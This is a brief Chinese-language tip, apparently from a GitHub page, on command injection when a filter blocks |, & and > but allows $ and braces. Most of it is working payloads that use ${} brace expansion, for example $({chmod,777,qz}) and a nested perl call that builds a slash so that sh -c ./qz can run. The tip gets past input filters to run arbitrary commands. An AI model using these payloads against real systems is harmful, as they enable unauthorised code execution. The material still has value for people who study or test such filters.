We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
今天遇到一个命令注入,但是只能用!@^*$()_-={}[].,'~, 也就是说| & > 不能用,但是$能用,这时就可以可以充分使用${}来进行命令注入。
!@^*$()_-={}[].,'~
|
&
>
$
${}
例如,
$({chmod,777,qz})等同于chmod 777 qz
$({chmod,777,qz})
chmod 777 qz
$({sh,-c,.$({perl,-e,'print(chr(0x2f))'})qz}) 等同于 sh -c ./qz
$({sh,-c,.$({perl,-e,'print(chr(0x2f))'})qz})
sh -c ./qz